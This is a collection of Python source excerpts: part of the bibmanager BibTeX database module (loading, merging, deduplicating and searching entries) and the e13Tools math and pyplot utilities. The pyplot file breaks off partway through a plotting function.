author = {<NAME> and <NAME> and <NAME>},
title = {SciPy: Open source scientific tools for Python},
year = {2001},
}'''
>>> bibs = [bm.Bib(e1), bm.Bib(e2)]
>>> bm.display_bibs(["DATABASE:\n", "NEW:\n"], bibs)
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DATABASE:
@Misc{JonesEtal2001scipy,
author = {<NAME> and <NAME> and <NAME>},
title = {{SciPy}: Open source scientific tools for {Python}},
year = {2001},
}
NEW:
@Misc{Jones2001,
author = {<NAME> and <NAME> and <NAME>},
title = {SciPy: Open source scientific tools for Python},
year = {2001},
}
"""
style = prompt_toolkit.styles.style_from_pygments_cls(
pygments.styles.get_style_by_name(cm.get('style')))
if labels is None:
labels = ["" for _ in bibs]
tokens = [(Token.Comment, u.BANNER)]
for label,bib in zip(labels, bibs):
tokens += [(Token.Text, label)]
tokens += list(pygments.lex(bib.content, lexer=BibTeXLexer()))
tokens += [(Token.Text, "\n")]
print_formatted_text(PygmentsTokens(tokens), end="", style=style)
def remove_duplicates(bibs, field):
"""
Look for duplicates (within a same list of entries) by field and
remove them (in place).
Parameters
----------
bibs: List of Bib() objects
Entries to filter.
field: String
Field to use for filtering ('doi', 'isbn', 'bibcode', or 'eprint').
"""
fieldlist = [getattr(bib,field) if getattr(bib,field) is not None else ""
for bib in bibs]
# No entries:
if len(fieldlist) == 0:
return
ubib, uinv, counts = np.unique(fieldlist, return_inverse=True,
return_counts=True)
multis = np.where((counts > 1) & (ubib != ""))[0]
# No duplicates:
if len(multis) == 0:
return
removes = []
for m in multis:
all_indices = np.where(uinv == m)[0]
entries = [bibs[i].content for i in all_indices]
# Remove identical entries:
uentries, uidx = np.unique(entries, return_index=True)
indices = list(all_indices[uidx])
removes += [idx for idx in all_indices if idx not in indices]
nbibs = len(uentries)
if nbibs == 1:
continue
# Pick peer-reviewed over ArXiv over non-ADS:
pubs = [bibs[i].published() for i in indices]
pubmax = np.amax(pubs)
removes += [idx for idx,pub in zip(indices,pubs) if pub < pubmax]
indices = [idx for idx,pub in zip(indices,pubs) if pub == pubmax]
nbibs = len(indices)
if nbibs == 1:
continue
# Querry the user:
labels = [idx + " ENTRY:\n" for idx in u.ordinal(np.arange(nbibs)+1)]
display_bibs(labels, [bibs[i] for i in indices])
s = u.req_input(f"Duplicate {field} field, []keep first, [2]second, "
"[3]third, etc.: ", options=[""]+list(np.arange(nbibs)+1))
if s == "":
indices.pop(0)
else:
indices.pop(int(s)-1)
removes += indices
for idx in reversed(sorted(removes)):
bibs.pop(idx)
def filter_field(bibs, new, field, take):
"""
Filter duplicate entries by field between new and bibs.
This routine modifies new removing the duplicates, and may modify
bibs (depending on take argument).
Parameters
----------
bibs: List of Bib() objects
Database entries.
new: List of Bib() objects
New entries to add.
field: String
Field to use for filtering.
take: String
Decision-making protocol to resolve conflicts when there are
partially duplicated entries.
'old': Take the database entry over new.
'new': Take the new entry over the database.
'ask': Ask user to decide (interactively).
"""
fields = [getattr(e,field) for e in bibs]
removes = []
for i,e in enumerate(new):
if getattr(e,field) is None or getattr(e,field) not in fields:
continue
idx = fields.index(getattr(e,field))
# Replace if duplicate and new has newer bibcode:
if e.published() > bibs[idx].published() or take=='new':
bibs[idx] = e
# Look for different-key conflict:
if e.key != bibs[idx].key and take == "ask":
display_bibs(["DATABASE:\n", "NEW:\n"], [bibs[idx], e])
s = u.req_input(f"Duplicate {field} field but different keys, []keep "
"database or take [n]ew: ", options=["", "n"])
if s == "n":
bibs[idx] = e
removes.append(i)
for idx in reversed(sorted(removes)):
new.pop(idx)
def loadfile(bibfile=None, text=None):
"""
Create a list of Bib() objects from a BibTeX file (.bib file).
Parameters
----------
bibfile: String
Path to an existing .bib file.
text: String
Content of a .bib file (ignored if bibfile is not None).
Returns
-------
bibs: List of Bib() objects
List of Bib() objects of BibTeX entries in bibfile, sorted by
Sort_author() fields.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> import os
>>> bibfile = os.path.expanduser("~") + "/.bibmanager/examples/sample.bib"
>>> bibs = bm.loadfile(bibfile)
"""
entries = [] # Store Lists of bibtex entries
entry = [] # Store lines in the bibtex
parcount = 0
# Load a bib file:
if bibfile is not None:
f = open(bibfile, 'r')
elif text is not None:
f = text.splitlines()
else:
raise TypeError("Missing input arguments for loadfile(), at least "
"bibfile or text must be provided.")
for i,line in enumerate(f):
# New entry:
if line.startswith("@") and parcount != 0:
raise ValueError(f"Mismatched braces in line {i}:\n'{line.rstrip()}'")
parcount += u.count(line)
if parcount == 0 and entry == []:
continue
if parcount < 0:
raise ValueError(f"Mismatched braces in line {i}:\n'{line.rstrip()}'")
entry.append(line.rstrip())
if parcount == 0 and entry != []:
entries.append("\n".join(entry))
entry = []
if bibfile is not None:
f.close()
if parcount != 0:
raise ValueError("Invalid input, mistmatched braces at end of file.")
bibs = [Bib(entry) for entry in entries]
remove_duplicates(bibs, "doi")
remove_duplicates(bibs, "isbn")
remove_duplicates(bibs, "bibcode")
remove_duplicates(bibs, "eprint")
return sorted(bibs)
def save(entries):
"""
Save list of Bib() entries into bibmanager pickle database.
Parameters
----------
entries: List of Bib() objects
bib files to store.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> # TBD: Load some entries
>>> bm.save(entries)
"""
# FINDME: Don't pickle-save the Bib() objects directly, but store them
# as dict objects. (More standard / backward compatibility)
with open(u.BM_DATABASE, 'wb') as handle:
pickle.dump(entries, handle, protocol=pickle.HIGHEST_PROTOCOL)
def load():
"""
Load the bibmanager database of BibTeX entries.
Returns
-------
List of Bib() entries. Return an empty list if there is no database
file.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> bibs = bm.load()
"""
try:
with open(u.BM_DATABASE, 'rb') as handle:
return pickle.load(handle)
except:
# TBD: I think I'm not defaulting to this case anymore, I should
# let it break if the input file does not exist
return []
def export(entries, bibfile=u.BM_BIBFILE):
"""
Export list of Bib() entries into a .bib file.
Parameters
----------
entries: List of Bib() objects
Entries to export.
bibfile: String
Output .bib file name.
"""
# Header for identification purposes:
header = ['This file was created by bibmanager\n',
'https://pcubillos.github.io/bibmanager/\n\n']
# Care not to overwrite user's bib files:
if os.path.exists(bibfile):
with open(bibfile, 'r') as f:
head = f.readline()
if head.strip() != header[0].strip():
path, bfile = os.path.split(os.path.realpath(bibfile))
shutil.copy(bibfile, "".join([path, '/orig_',
str(datetime.date.today()), '_', bfile]))
with open(bibfile, 'w') as f:
f.writelines(header)
for e in entries:
f.write(e.content)
f.write("\n\n")
def merge(bibfile=None, new=None, take="old", base=None):
"""
Merge entries from a new bibfile into the bibmanager database
(or into an input database).
Parameters
----------
bibfile: String
New .bib file to merge into the bibmanager database.
new: List of Bib() objects
List of new BibTeX entries (ignored if bibfile is not None).
take: String
Decision-making protocol to resolve conflicts when there are
partially duplicated entries.
'old': Take the database entry over new.
'new': Take the new entry over the database.
'ask': Ask user to decide (interactively).
base: List of Bib() objects
If None, merge new entries into the bibmanager database.
If not None, merge new intries into base.
Returns
-------
bibs: List of Bib() objects
Merged list of BibTeX entries.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> import os
>>> # TBD: Need to add sample2.bib into package.
>>> newbib = os.path.expanduser("~") + "/.bibmanager/examples/sample2.bib"
>>> # Merge newbib into database:
>>> bm.merge(newbib, take='old')
"""
if base is None:
bibs = load()
else:
bibs = base
if bibfile is not None:
new = loadfile(bibfile)
if new is None:
return
# Filter duplicates by field:
filter_field(bibs, new, "doi", take)
filter_field(bibs, new, "isbn", take)
filter_field(bibs, new, "bibcode", take)
filter_field(bibs, new, "eprint", take)
# Filter duplicate key:
keep = np.zeros(len(new), bool)
bm_keys = [e.key for e in bibs]
for i,e in enumerate(new):
if e.key not in bm_keys:
keep[i] = True
continue
idx = bm_keys.index(e.key)
if e.content == bibs[idx].content:
continue # Duplicate, do not take
else:
display_bibs(["DATABASE:\n", "NEW:\n"], [bibs[idx], e])
s = input("Duplicate key but content differ, []ignore new, "
"take [n]ew, or\nrename key of new entry: ")
if s == "n":
bibs[idx] = e
elif s != "":
new[i].key = s
new[i].content.replace(e.key, s)
keep[i] = True
new = [e for e,keeper in zip(new,keep) if keeper]
# Different key, same title:
keep = np.zeros(len(new), bool)
bm_titles = [e.title for e in bibs]
for i,e in enumerate(new):
if e.title not in bm_titles:
keep[i] = True
continue
idx = bm_titles.index(e.title)
display_bibs(["DATABASE:\n", "NEW:\n"], [bibs[idx], e])
s = u.req_input("Possible duplicate, same title but keys differ, "
"[]ignore new, [r]eplace database with new, "
"or [a]dd new: ", options=["", "r", "a"])
if s == "r":
bibs[idx] = e
elif s == "a":
keep[i] = True
new = [e for e,keeper in zip(new,keep) if keeper]
# Add all new entries and sort:
bibs = sorted(bibs + new)
print(f"\nMerged {len(new)} new entries.")
if base is None:
save(bibs)
export(bibs)
return bibs
def init(bibfile=u.BM_BIBFILE, reset_db=True, reset_config=False):
"""
Initialize bibmanager, reset database entries and config parameters.
Parameters
----------
bibfile: String
A bibfile to include as the new bibmanager database.
If None, reset the bibmanager database with a clean slate.
reset_db: Bool
If True, reset the bibmanager database.
reset_config: Bool
If True, reset the config file.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> import os
>>> bibfile = os.path.expanduser("~") + "/.bibmanager/examples/sample.bib"
>>> bm.init(bibfile)
"""
# First install ever:
if not os.path.exists(u.HOME):
os.mkdir(u.HOME)
# Copy examples folder:
shutil.rmtree(u.HOME+'examples/', True)
shutil.copytree(u.ROOT+'examples/', u.HOME+'examples/')
# Make sure config exists before working with the database:
if reset_config:
shutil.copy(u.ROOT+'config', u.HOME+'config')
else:
cm.update_keys()
if reset_db:
if bibfile is None:
with u.ignored(OSError):
os.remove(u.BM_DATABASE)
os.remove(u.BM_BIBFILE)
else:
bibs = loadfile(bibfile)
save(bibs)
export(bibs)
def add_entries(take='ask'):
"""
Manually add BibTeX entries through the prompt.
Parameters
----------
take: String
Decision-making protocol to resolve conflicts when there are
partially duplicated entries.
'old': Take the database entry over new.
'new': Take the new entry over the database.
'ask': Ask user to decide (interactively).
"""
style = prompt_toolkit.styles.style_from_pygments_cls(
pygments.styles.get_style_by_name(cm.get('style')))
newbibs = prompt_toolkit.prompt(
"Enter a BibTeX entry (press META+ENTER or ESCAPE ENTER when done):\n",
multiline=True, lexer=lexer, style=style)
new = loadfile(text=newbibs)
if len(new) == 0:
print("No new entries to add.")
return
merge(new=new, take=take)
def edit():
"""
Manually edit the bibfile database in text editor.
Resources
---------
https://stackoverflow.com/questions/17317219/
https://docs.python.org/3.6/library/subprocess.html
"""
export(load(), u.BM_TMP_BIB)
# Open database.bib into temporary file with default text editor
if sys.platform == "win32":
os.startfile(u.BM_TMP_BIB)
else:
opener = cm.get('text_editor')
if opener == 'default':
opener = "open" if sys.platform == "darwin" else "xdg-open"
subprocess.call([opener, u.BM_TMP_BIB])
# Launch input() call to wait for user to save edits:
dummy = input("Press ENTER to continue after you edit, save, and close "
"the bib file.")
# Check edits:
try:
new = loadfile(u.BM_TMP_BIB)
finally:
# Always delete the tmp file:
os.remove(u.BM_TMP_BIB)
# Update database if everything went fine:
save(new)
export(new)
def search(authors=None, year=None, title=None, key=None, bibcode=None):
"""
Search in bibmanager database by authors, year, or title keywords.
Parameters
----------
authors: String or List of strings
An author name (or list of names) with BibTeX format (see parse_name()
docstring). To restrict search to a first author, prepend the
'^' character to a name.
year: Integer or two-element integer tuple
If integer, match against year; if tuple, minimum and maximum
matching years (including).
title: String or iterable (list, tuple, or ndarray of strings)
Match entries that contain all input strings in the title (ignore case).
key: String or list of strings
Match any entry whose key is in the input key.
bibcode: String or list of strings
Match any entry whose bibcode is in the input bibcode.
Returns
-------
matches: List of Bib() objects
Entries that match all input criteria.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> # Search by last name:
>>> matches = bm.search(authors="Cubillos")
>>> # Search by last name and initial:
>>> matches = bm.search(authors="<NAME>")
>>> # Search by author in given year:
>>> matches = bm.search(authors="<NAME>", year=2017)
>>> # Search by first author and co-author (using AND logic):
>>> matches = bm.search(authors=["^Cubillos", "Blecic"])
>>> # Search by keyword in title:
>>> matches = bm.search(title="Spitzer")
>>> # Search by keywords in title (using AND logic):
>>> matches = bm.search(title=["HD 189", "HD 209"])
>>> # Search by key (note that unlike the other fields, key and
>>> # bibcode use OR logic, so you can get many items at once):
>>> matches = bm.search(key="Astropycollab2013aaAstropy")
>>> # Search by bibcode (note no need to worry about UTF-8 encoding):
>>> matches = bm.search(bibcode=["2013A%26A...558A..33A",
>>> "1957RvMP...29..547B",
>>> "2017AJ....153....3C"])
"""
matches = load()
if year is not None:
try: # Assume year = [from_year, to_year]
matches = [bib for bib in matches if bib.year >= year[0]]
matches = [bib for bib in matches if bib.year <= year[1]]
except:
matches = [bib for bib in matches if bib.year == year]
if authors is not None:
if isinstance(authors, str):
authors = [authors]
elif not isinstance(authors, (list, tuple, np.ndarray)):
raise ValueError("Invalid input format for 'authors'.")
for author in authors:
matches = [bib for bib in matches if author in bib]
if title is not None:
if isinstance(title, str):
title = [title]
elif not isinstance(title, (list, tuple, np.ndarray)):
raise ValueError("Invalid input format for 'title'.")
for word in title:
matches = [bib for bib in matches
if word.lower() in bib.title.lower()]
if key is not None:
if isinstance(key, str):
key = [key]
elif not isinstance(key, (list, tuple, np.ndarray)):
raise ValueError("Invalid input format for 'key'.")
matches = [bib for bib in matches if bib.key in key]
if bibcode is not None:
if isinstance(bibcode, str):
bibcode = [bibcode]
elif not isinstance(bibcode, (list, tuple, np.ndarray)):
raise ValueError("Invalid input format for 'bibcode'.")
# Take care of encoding:
bibcode = [urllib.parse.unquote(b) for b in bibcode]
matches = [bib for bib in matches if bib.bibcode in bibcode]
return matches
``` |
{
"source": "1313e/e13Tools",
"score": 4
} |
#### File: e13Tools/e13tools/math.py
```python
from functools import reduce
from math import factorial
# Package imports
import numpy as np
from numpy.linalg import cholesky, eigvals, LinAlgError, norm, svd
# e13Tools imports
from e13tools.core import ShapeError
from e13tools.numpy import transposeC
# All declaration
__all__ = ['gcd', 'is_PD', 'lcm', 'nCr', 'nearest_PD', 'nPr']
# %% FUNCTIONS
# This function calculates the greatest common divisor of a sequence
def gcd(*args):
"""
Returns the greatest common divisor of the provided sequence of integers.
Parameters
----------
args : tuple of int
Integers to calculate the greatest common divisor for.
Returns
-------
gcd : int
Greatest common divisor of input integers.
Example
-------
>>> gcd(18, 60, 72, 138)
6
See also
--------
:func:`~lcm`
Least common multiple for sequence of integers.
"""
return(reduce(gcd_single, args))
# This function calculates the greatest common divisor of two integers
def gcd_single(a, b):
"""
Returns the greatest common divisor of the integers `a` and `b` using
Euclid's Algorithm [1]_.
Parameters
----------
a, b : int
The two integers to calculate the greatest common divisor for.
Returns
-------
gcd : int
Greatest common divisor of `a` and `b`.
Notes
-----
The calculation of the greatest common divisor uses Euclid's Algorithm [1]_
with Lamé's improvements.
References
----------
.. [1] https://en.wikipedia.org/wiki/Euclidean_algorithm
Example
-------
>>> gcd_single(42, 56)
14
See also
--------
:func:`~gcd`
Greatest common divisor for sequence of integers.
:func:`~lcm`
Least common multiple for sequence of integers.
:func:`~core.lcm_single`
Least common multiple for two integers.
"""
while(b):
a, b = b, a % b
return(a)
# This function determines if a matrix is positive-definite
def is_PD(matrix):
"""
Checks if `matrix` is positive-definite or not, by using the
:func:`~numpy.linalg.cholesky` function. It is required for `matrix` to be
Hermitian.
Parameters
----------
matrix : 2D array_like
Matrix that requires checking.
Returns
-------
out: bool
*True* if `matrix` is positive-definite, *False* if it is not.
Examples
--------
Using a real matrix that is positive-definite (like the identity matrix):
>>> matrix = np.eye(3)
>>> matrix
array([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]])
>>> is_PD(matrix)
True
Using a real matrix that is not symmetric (Hermitian):
>>> matrix = np.array([[1, 2], [3, 4]])
>>> matrix
array([[1, 2],
[3, 4]])
>>> is_PD(matrix)
Traceback (most recent call last):
...
ValueError: Input argument 'matrix' must be Hermitian!
Using a complex matrix that is positive-definite:
>>> matrix = np.array([[4, 1.5+1j], [1.5-1j, 3]])
>>> matrix
array([[ 4.0+0.j, 1.5+1.j],
[ 1.5-1.j, 3.0+0.j]])
>>> is_PD(matrix)
True
See also
--------
:func:`~nearest_PD`
Find the nearest positive-definite matrix to the input `matrix`.
"""
# Make sure that matrix is a numpy array
matrix = np.asarray(matrix)
# Check if input is a matrix
if(matrix.ndim != 2):
raise ShapeError("Input argument 'matrix' must be two-dimensional!")
else:
rows, columns = matrix.shape
# Check if matrix is a square
if(rows != columns):
raise ShapeError("Input argument 'matrix' has shape [%s, %s]. 'matrix'"
" must be a square matrix!" % (rows, columns))
# Check if matrix is Hermitian
if not np.allclose(transposeC(matrix), matrix):
raise ValueError("Input argument 'matrix' must be Hermitian!")
# Try to use Cholesky on matrix. If it fails,
try:
cholesky(matrix)
except LinAlgError:
return(False)
else:
return(True)
# This function calculates the least common multiple of a sequence
def lcm(*args):
"""
Returns the least common multiple of the provided sequence of integers.
If at least one integer is zero, the output will also be zero.
Parameters
----------
args : tuple of int
Integers to calculate the least common multiple for.
Returns
-------
lcm : int
Least common multiple of input integers.
Example
-------
>>> lcm(8, 9, 21)
504
See also
--------
:func:`~gcd`
Greatest common divisor for sequence of integers.
"""
return(reduce(lcm_single, args))
# This function calculates the least common multiple of two integers
def lcm_single(a, b):
"""
Returns the least common multiple of the integers `a` and `b`.
If at least one integer is zero, the output will also be zero.
Parameters
----------
a, b : int
The two integers to calculate the least common multiple for.
Returns
-------
lcm : int
Least common multiple of `a` and `b`.
Notes
-----
The least common multiple of two given integers :math:`a` and :math:`b` is
given by
.. math:: \\mathrm{lcm}(a, b)=\\frac{|a\\cdot b|}{\\mathrm{gcd}(a, b)},
which can also be written as
.. math:: \\mathrm{lcm}(a, b)=\\frac{|a|}{\\mathrm{gcd}(a, b)}\\cdot \
|b|,
with :math:`\\mathrm{gcd}` being the greatest common divisor.
Example
-------
>>> lcm_single(6, 21)
42
See also
--------
:func:`~gcd`
Greatest common divisor for sequence of integers.
:func:`~core.gcd_single`
Greatest common divisor for two integers.
:func:`~lcm`
Least common multiple for sequence of integers.
"""
return(0 if(a == 0 or b == 0) else (abs(a)//gcd_single(a, b))*abs(b))
# This function calculates the number of unordered arrangements
def nCr(n, r, repeat=False):
"""
For a given set S of `n` elements, returns the number of unordered
arrangements ("combinations") of length `r` one can make with S.
Returns zero if `r` > `n` and `repeat` is *False*.
Parameters
----------
n : int
Number of elements in the set S.
r : int
Number of elements in the sub-set of set S.
Optional
--------
repeat : bool. Default: False
If *False*, each element in S can only be chosen once.
If *True*, they can be chosen more than once.
Returns
-------
n_comb : int
Number of "combinations" that can be made with S.
Examples
--------
>>> nCr(4, 2)
6
>>> nCr(4, 2, repeat=True)
10
>>> nCr(2, 4, repeat=True)
5
>>> nCr(2, 4)
0
See also
--------
:func:`~nPr`
Returns the number of ordered arrangements.
"""
# Check if repeat is True or not and act accordingly
if(r == 0):
return(1)
elif(r == 1):
return(n)
elif repeat:
return(factorial(n+r-1)//(factorial(r)*factorial(n-1)))
elif(r == n-1):
return(n)
elif(r == n):
return(1)
elif(r > n):
return(0)
else:
return(factorial(n)//(factorial(r)*factorial(n-r)))
# This function converts a given matrix to its nearest PD variant
def nearest_PD(matrix):
"""
Find the nearest positive-definite matrix to the input `matrix`.
Parameters
----------
matrix : 2D array_like
Input matrix that requires its nearest positive-definite variant.
Returns
-------
mat_PD : 2D :obj:`~numpy.ndarray` object
The nearest positive-definite matrix to the input `matrix`.
Notes
-----
This is a Python port of <NAME>'s *nearestSPD* code [1]_, which is a
MATLAB implementation of Higham (1988) [2]_.
According to Higham (1988), the nearest positive semi-definite matrix in
the Frobenius norm to an arbitrary real matrix :math:`A` is shown to be
.. math:: \\frac{B+H}{2},
with :math:`H` being the symmetric polar factor of
.. math:: B=\\frac{A+A^T}{2}.
On page 2, the author mentions that all matrices :math:`A` are assumed to
be real, but that the method can be very easily extended to the complex
case. This can indeed be done easily by taking the conjugate transpose
instead of the normal transpose in the formula on the above.
References
----------
.. [1] \
https://www.mathworks.com/matlabcentral/fileexchange/42885-nearestspd
.. [2] <NAME>, "Computing a Nearest Symmetric Positive Semidefinite
Matrix" (1988): https://doi.org/10.1016/0024-3795(88)90223-6
Examples
--------
Requesting the nearest PD variant of a matrix that is already PD results
in it being returned immediately:
>>> matrix = np.eye(3)
>>> matrix
array([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]])
>>> is_PD(matrix)
True
>>> nearest_PD(matrix)
array([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]])
Using a real non-PD matrix results in it being transformed into an
PD-matrix:
>>> matrix = np.array([[1, 2], [3, 4]])
>>> matrix
array([[1, 2],
[3, 4]])
>>> is_PD(matrix)
Traceback (most recent call last):
...
ValueError: Input argument 'matrix' must be Hermitian!
>>> mat_PD = nearest_PD(matrix)
>>> mat_PD
array([[ 1.31461828, 2.32186616],
[ 2.32186616, 4.10085767]])
>>> is_PD(mat_PD)
True
Using a complex non-PD matrix converts it into the nearest complex
PD-matrix:
>>> matrix = np.array([[4, 2+1j], [1+3j, 3]])
>>> matrix
array([[ 4.+0.j, 2.+1.j],
[ 1.+3.j, 3.+0.j]])
>>> mat_PD = nearest_PD(matrix)
>>> mat_PD
array([[ 4.0+0.j, 1.5-1.j],
[ 1.5+1.j, 3.0+0.j]])
>>> is_PD(mat_PD)
True
See also
--------
:func:`~is_PD`
Checks if `matrix` is positive-definite or not.
"""
# Make sure that matrix is a numpy array
matrix = np.asarray(matrix)
# Check if input is a matrix
if(matrix.ndim != 2):
raise ShapeError("Input argument 'matrix' must be two-dimensional!")
else:
rows, columns = matrix.shape
# Check if matrix is a square
if(rows != columns):
raise ShapeError("Input argument 'matrix' has shape [%s, %s]. 'matrix'"
" must be a square matrix!" % (rows, columns))
# Check if matrix is not already positive-definite
try:
is_PD(matrix)
except ValueError:
pass
else:
if is_PD(matrix):
return(matrix)
# Make sure that the matrix is Hermitian
mat_H = (matrix+transposeC(matrix))/2
# Perform singular value decomposition
_, S, VH = svd(mat_H)
# Compute the symmetric polar factor of mat_H
spf = np.dot(transposeC(VH), np.dot(np.diag(S), VH))
# Obtain the positive-definite matrix candidate
mat_PD = (mat_H+spf)/2
# Ensure that mat_PD is Hermitian
mat_PD = (mat_PD+transposeC(mat_PD))/2
# Check if mat_PD is in fact positive-definite
if is_PD(mat_PD):
return(mat_PD)
# If it is not, change it very slightly to make it positive-definite
In = np.eye(rows)
k = 1
spacing = np.spacing(norm(matrix))
while not is_PD(mat_PD):
min_eig_val = np.min(np.real(eigvals(mat_PD)))
mat_PD += In*(-1*min_eig_val*pow(k, 2)+spacing)
k += 1
else:
return(mat_PD)
# This function calculates the number of ordered arrangements
def nPr(n, r, repeat=False):
"""
For a given set S of `n` elements, returns the number of ordered
arrangements ("permutations") of length `r` one can make with S.
Returns zero if `r` > `n` and `repeat` is *False*.
Parameters
----------
n : int
Number of elements in the set S.
r : int
Number of elements in the sub-set of set S.
Optional
--------
repeat : bool. Default: False
If *False*, each element in S can only be chosen once.
If *True*, they can be chosen more than once.
Returns
-------
n_perm : int
Number of "permutations" that can be made with S.
Examples
--------
>>> nPr(4, 2)
12
>>> nPr(4, 2, repeat=True)
16
>>> nPr(2, 4, repeat=True)
16
>>> nPr(2, 4)
0
See also
--------
:func:`~nCr`
Returns the number of unordered arrangements.
"""
# Check if repeat is True or not and act accordingly
if(r == 0):
return(1)
elif(r == 1):
return(n)
elif repeat:
return(pow(n, r))
elif(r > n):
return(0)
else:
return(factorial(n)//factorial(n-r))
```
#### File: e13Tools/e13tools/pyplot.py
```python
try:
import astropy.units as apu
import_astropy = 1
except ImportError: # pragma: no cover
import_astropy = 0
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib import transforms
import numpy as np
# e13Tools imports
from e13tools.core import InputError
# All declaration
__all__ = ['apu2tex', 'center_spines', 'draw_textline', 'f2tex', 'q2tex']
# %% FUNCTIONS
# This function converts an astropy unit into a TeX string
def apu2tex(unit, unitfrac=False):
"""
Transform a :obj:`~astropy.units.Unit` object into a (La)TeX string for
usage in a :obj:`~matplotlib.figure.Figure` instance.
Parameters
----------
unit : :obj:`~astropy.units.Unit` object
Unit to be transformed.
Optional
--------
unitfrac : bool. Default: False
Whether or not to write `unit` as a LaTeX fraction.
Returns
-------
out : string
String containing `unit` written in (La)TeX string.
Examples
--------
>>> import astropy.units as apu
>>> apu2tex(apu.solMass)
'\\mathrm{M_{\\odot}}'
>>> import astropy.units as apu
>>> apu2tex(apu.solMass/apu.yr, unitfrac=False)
'\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> import astropy.units as apu
>>> apu2tex(apu.solMass/apu.yr, unitfrac=True)
'\\mathrm{\\frac{M_{\\odot}}{yr}}'
"""
if import_astropy:
if not unitfrac:
string = unit.to_string('latex_inline')
else:
string = unit.to_string('latex')
# Remove '$' from the string and make output a string (py2.7)
return(str(string.replace("$", "")))
else: # pragma: no cover
raise ImportError("This function requires AstroPy!")
# This function centers the axes of the provided axes
def center_spines(centerx=0, centery=0, set_xticker=False, set_yticker=False,
ax=None):
"""
Centers the axis spines at <`centerx`, `centery`> on the axis `ax` in a
:obj:`~matplotlib.figure.Figure` instance. Centers the axis spines at the
origin by default.
Optional
--------
centerx : int or float. Default: 0
Centers x-axis at value `centerx`.
centery : int or float. Default: 0
Centers y-axis at value `centery`.
set_xticker : int, float or False. Default: False
If int or float, sets the x-axis ticker to `set_xticker`.
If *False*, let :obj:`~matplotlib.figure.Figure` instance decide.
set_yticker : int, float or False. Default: False
If int or float, sets the y-axis ticker to `set_yticker`.
If *False*, let :obj:`~matplotlib.figure.Figure` instance decide.
ax : :obj:`~matplotlib.axes.Axes` object or None. Default: None
If :obj:`~matplotlib.axes.Axes` object, centers the axis spines
of specified :obj:`~matplotlib.figure.Figure` instance.
If *None*, centers the axis spines of current
:obj:`~matplotlib.figure.Figure` instance.
"""
# If no AxesSubplot object is provided, make one
if ax is None:
ax = plt.gca()
# Set the axis's spines to be centered at the given point
# (Setting all 4 spines so that the tick marks go in both directions)
ax.spines['left'].set_position(('data', centerx))
ax.spines['bottom'].set_position(('data', centery))
ax.spines['right'].set_position(('data', centerx))
ax.spines['top'].set_position(('data', centery))
# Hide the line (but not ticks) for "extra" spines
for side in ['right', 'top']:
ax.spines[side].set_color('none')
# On both the x and y axes...
for axis, center in zip([ax.xaxis, ax.yaxis], [centerx, centery]):
# TODO: STILL HAVE TO FIX THAT THE TICKLABELS ARE ALWAYS HIDDEN
# Hide the ticklabels at <centerx, centery>
formatter = mpl.ticker.ScalarFormatter()
formatter.center = center
axis.set_major_formatter(formatter)
# Add origin offset ticklabel if <centerx=0, centery=0> using annotation
if(centerx == 0 and centery == 0):
xlabel, ylabel = map(formatter.format_data, [centerx, centery])
ax.annotate("0", (centerx, centery), xytext=(-4, -4),
textcoords='offset points', ha='right', va='top')
# Set x-axis ticker
if set_xticker:
ax.xaxis.set_major_locator(mpl.ticker.MultipleLocator(set_xticker))
# Set y-axis ticker
if set_yticker:
ax.yaxis.set_major_locator(mpl.ticker.MultipleLocator(set_yticker))
# This function draws a line with text in the provided figure
def draw_textline(text, *, x=None, y=None, pos='start top', ax=None,
line_kwargs={}, text_kwargs={}):
"""
Draws a line on the axis `ax` in a :obj:`~matplotlib.figure.Figure`
instance and prints `text` on top.
Parameters
----------
text : str
Text to be printed on the line.
x : scalar or None
If scalar, text/line x-coordinate.
If *None*, line covers complete x-axis.
Either `x` or `y` needs to be *None*.
y : scalar or None
If scalar, text/line y-coordinate.
If *None*, line covers complete y-axis.
Either `x` or `y` needs to be *None*.
Optional
--------
pos : {'start', 'end'}{'top', 'bottom'}. Default: 'start top'
If 'start', prints the text at the start of the drawn line.
If 'end', prints the text at the end of the drawn line.
If 'top', prints the text above the drawn line.
If 'bottom', prints the text below the drawn line.
Arguments must be given as a single string.
ax : :obj:`~matplotlib.axes.Axes` object or None. Default: None
If :obj:`~matplotlib.axes.Axes` object, draws line in specified
:obj:`~matplotlib.figure.Figure` instance.
If *None*, draws line in current :obj:`~matplotlib.figure.Figure`
instance.
line_kwargs : dict of :class:`~matplotlib.lines.Line2D` properties.\
Default: {}
The keyword arguments used for drawing the line.
text_kwargs : dict of :class:`~matplotlib.text.Text` properties.\
Default: {}
The keyword arguments used for drawing the text.
"""
# If no AxesSubplot object is provided, make one
if ax is None:
ax = plt.gca()
# Convert pos to lowercase
pos = pos.lower()
# Set default line_kwargs and text_kwargs
default_line_kwargs = {'linestyle': '-',
'color': 'k'}
default_text_kwargs = {'color': 'k',
'fontsize': 14}
# Combine given kwargs with default ones
default_line_kwargs.update(line_kwargs)
default_text_kwargs.update(text_kwargs)
line_kwargs = default_line_kwargs
text_kwargs = default_text_kwargs
# Check if certain keyword arguments are present in text_fmt
text_keys = list(text_kwargs.keys())
for key in text_keys:
if key in ('va', 'ha', 'verticalalignment', 'horizontalalignment',
'rotation', 'transform', 'x', 'y', 's'):
text_kwargs.pop(key)
# Set line specific variables
if x is None and y is not None:
ax.axhline(y, **line_kwargs)
elif x is not None and y is None:
ax.axvline(x, **line_kwargs)
else:
raise InputError("Either of input arguments 'x' and 'y' needs to be "
"*None*!")
# Gather case specific text properties
if ('start') in pos and ('top') in pos:
ha = 'left' if x is None else 'right'
va = 'bottom'
other_axis = 0
elif ('start') in pos and ('bottom') in pos:
ha = 'left'
va = 'top' if x is None else 'bottom'
other_axis = 0
elif ('end') in pos and ('top') in pos:
ha = 'right'
va = 'bottom' if x is None else 'top'
other_axis = 1
elif ('end') in pos and ('bottom') in pos:
ha = 'right' if x is None else 'left'
va = 'top'
